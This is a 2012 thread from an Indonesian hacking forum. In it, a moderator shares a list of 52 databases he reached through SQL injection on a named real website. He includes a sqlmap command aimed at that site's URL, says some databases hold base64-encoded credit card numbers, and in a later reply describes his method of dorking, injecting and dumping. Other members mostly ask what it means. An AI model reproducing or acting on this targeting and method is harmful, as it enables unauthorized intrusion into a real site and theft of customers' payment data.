Indonesian SWF Editor Community
 
HomeRegisterLog in
SELAMAT Datang Di Cmonhackns ===> Mulailah dari yang kecil... karena semua yang besar dulunya juga kecil..

Share | 
 

 [share]+50 DB(Database) gratis ni gan

View previous topic View next topic Go down 
AuthorMessage
RieqyNS13
Moderator
Moderator


Jumlah posting : 379
Join date : 2011-01-16
Age : 19
Lokasi : chmod 0655 GetConfig.SQL

PostSubject: [share]+50 DB(Database) gratis ni gan   Thu Jun 14, 2012 5:44 pm

agan2 cyber,,ane tdi nemuin 1 web vuln yaitu [You must be registered and logged in to see this link.] setelah ane scan, ternyata isinya ada 50 Database,,dan salah satu isi databasenya ada CC nya,,tpi ane lupa yg mana.
ni gan DB nya
Code:
available databases [52]:
[*] a_auction
[*] alexandrapotora
[*] alexanmedia
[*] celebrity_water
[*] certifiedgolf
[*] crm_dbg
[*] crm_freedomsmokeless
[*] dbg
[*] dbg_demo
[*] dbg_pmadb
[*] emailblaster
[*] es
[*] fiercegolf
[*] freegolfchat
[*] genr8blog
[*] genr8speed
[*] getfein
[*] glennllopis
[*] gllopisbook
[*] godog
[*] hfh_db
[*] information_schema
[*] iqplusfoods
[*] jeremiah
[*] l19
[*] lackpardtaiwan
[*] lackpardusa
[*] lackpardusa_old
[*] leestanton
[*] matchmatrix
[*] ms_matchmatrix
[*] myactivus
[*] myfightteam
[*] myfightteam_au
[*] mysql
[*] netfung
[*] nfblog
[*] nfgallery2
[*] nuconrad
[*] nutritiondr
[*] ollie8
[*] pearlcw
[*] pshc
[*] pshc_blog
[*] quickbuck
[*] reshapesociety
[*] secconnect
[*] sethback
[*] storagetreasure
[*] storagewars
[*] unityhomeloans
[*] wp_american

klo mw akses DB nya,,coba agan msuk pke sqlmap dgn target url [You must be registered and logged in to see this link.]
contoh :
Code:
root@sqlmap~#./sqlmap.py -u http://lackpardusa.com/product_list.php?cat_id=92 -D namaDB --tables
bom
coba agan cek isi DB nya satu-persatu,,ntar ada CC nya, tpi msih diencode pke base64, tpi bisa didecode kok gan
SS :
[You must be registered and logged in to see this image.]

by : RieqyNS13 & Sqlmap

_________________
403 Forbidden


Last edited by RieqyNS13 on Thu Jun 14, 2012 7:17 pm; edited 1 time in total
Back to top Go down
http://rieqyns13.net
DreamStealer
Super Moderator
Super Moderator


Jumlah posting : 933
Join date : 2011-01-12
Age : 20
Lokasi : Antara ada dan tiada

PostSubject: Re: [share]+50 DB(Database) gratis ni gan   Thu Jun 14, 2012 7:09 pm

itu maksudnya apaa??

_________________
Gunakanlah apa yg kau punya dengan sebaik2nya dan jangan pernah menggunakan hal itu untuk merugikan orang lain !
If You Want To Add Me on
Want to ask something? just send [You must be registered and logged in to see this image.]


[You must be registered and logged in to see this image.]
[You must be registered and logged in to see this image.]
Back to top Go down
RieqyNS13
Moderator
Moderator


Jumlah posting : 379
Join date : 2011-01-16
Age : 19
Lokasi : chmod 0655 GetConfig.SQL

PostSubject: Re: [share]+50 DB(Database) gratis ni gan   Thu Jun 14, 2012 7:15 pm

DreamStealer wrote:
itu maksudnya apaa??

itu kumpulan DB gan,,isinya data2 penting Admin, beberapa DB isinya ada Credit Card gan,,,tpi agan hrus teliti ngecek setiap nama tabel and column..

_________________
403 Forbidden
Back to top Go down
http://rieqyns13.net
DreamStealer
Super Moderator
Super Moderator


Jumlah posting : 933
Join date : 2011-01-12
Age : 20
Lokasi : Antara ada dan tiada

PostSubject: Re: [share]+50 DB(Database) gratis ni gan   Fri Jun 15, 2012 8:56 am

RieqyNS13 wrote:
DreamStealer wrote:
itu maksudnya apaa??

itu kumpulan DB gan,,isinya data2 penting Admin, beberapa DB isinya ada Credit Card gan,,,tpi agan hrus teliti ngecek setiap nama tabel and column..
saya aja enggak ngerti gimana cara ngorek2 data adminnya

_________________
Gunakanlah apa yg kau punya dengan sebaik2nya dan jangan pernah menggunakan hal itu untuk merugikan orang lain !
If You Want To Add Me on
Want to ask something? just send [You must be registered and logged in to see this image.]


[You must be registered and logged in to see this image.]
[You must be registered and logged in to see this image.]
Back to top Go down
ataze
Super Moderator
Super Moderator


Jumlah posting : 400
Join date : 2011-01-08
Age : 19
Lokasi : banyak game belum tamat

PostSubject: Re: [share]+50 DB(Database) gratis ni gan   Fri Jun 15, 2012 1:39 pm

drok biasa ente pake apa trus enten scan sqlnya pake tools ato dari web kalo pake tools minta ane

_________________
[You must be registered and logged in to see this image.]

[You must be registered and logged in to see this image.]
facebook
[You must be registered and logged in to see this image.]
Back to top Go down
RieqyNS13
Moderator
Moderator


Jumlah posting : 379
Join date : 2011-01-16
Age : 19
Lokasi : chmod 0655 GetConfig.SQL

PostSubject: Re: [share]+50 DB(Database) gratis ni gan   Fri Jun 15, 2012 3:11 pm

ataze wrote:
drok biasa ente pake apa trus enten scan sqlnya pake tools ato dari web kalo pake tools minta ane

ane newbie gan,,jadi ane pke web ama python tools gan,,pertama ane pke dork, trus dork nya ane scan biar dptnya lebih cpt and lebih banyak,,trus ntar muncul web vuln, nah web vuln tdi ane inject pke sqlmap, soalnya klo lewat havij dbnya cuma dpt satu,,
trus data2 di dbnya ane dump

_________________
403 Forbidden
Back to top Go down
http://rieqyns13.net
@roykinan
Admin
Admin


Jumlah posting : 610
Join date : 2011-01-29
Age : 20
Lokasi : Blitar

PostSubject: Re: [share]+50 DB(Database) gratis ni gan   Thu Jul 19, 2012 11:30 pm

wadaww.. ngomong apaan..

_________________
[You must be registered and logged in to see this image.]
Code:
twitter      : http://www.twitter.com/ROYKINAN
Faceboook     : http://www.facebook.com/ROYGAZEROCK
Blog         : http://www.ROYKINAN.blogspot.com
Back to top Go down
http://roykinan.blogspot.com
Sponsored content




PostSubject: Re: [share]+50 DB(Database) gratis ni gan   Today at 1:54 pm

Back to top Go down
 
[share]+50 DB(Database) gratis ni gan
View previous topic View next topic Back to top 
Page 1 of 1
 Similar topics
-
» Time Share Car
» rFactor Database
» Share dem guild cards!
» Tactic Training Database
» Mega Database 2013.ctg

Permissions in this forum:You cannot reply to topics in this forum
cmonhackns.n-stars.org :: Off Topic :: Chit - Chat-
Jump to: